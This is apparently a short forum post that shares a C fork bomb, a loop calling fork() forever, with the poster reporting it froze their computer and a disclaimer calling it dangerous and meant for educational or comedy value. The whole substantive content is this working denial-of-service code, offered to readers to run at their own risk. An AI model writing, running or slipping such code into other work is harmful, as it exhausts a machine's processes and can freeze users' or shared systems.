#include <unistd.h>
int main() {
for(;;)fork();
return 0;
}
I ran it and it instantly froze my computer. All with a few lines of code.Disclaimer:
This code is probably pointless and dangerous, use it at your own risk. It is really only intended for educational/comedy value.


Sign In
Create Account


Back to top









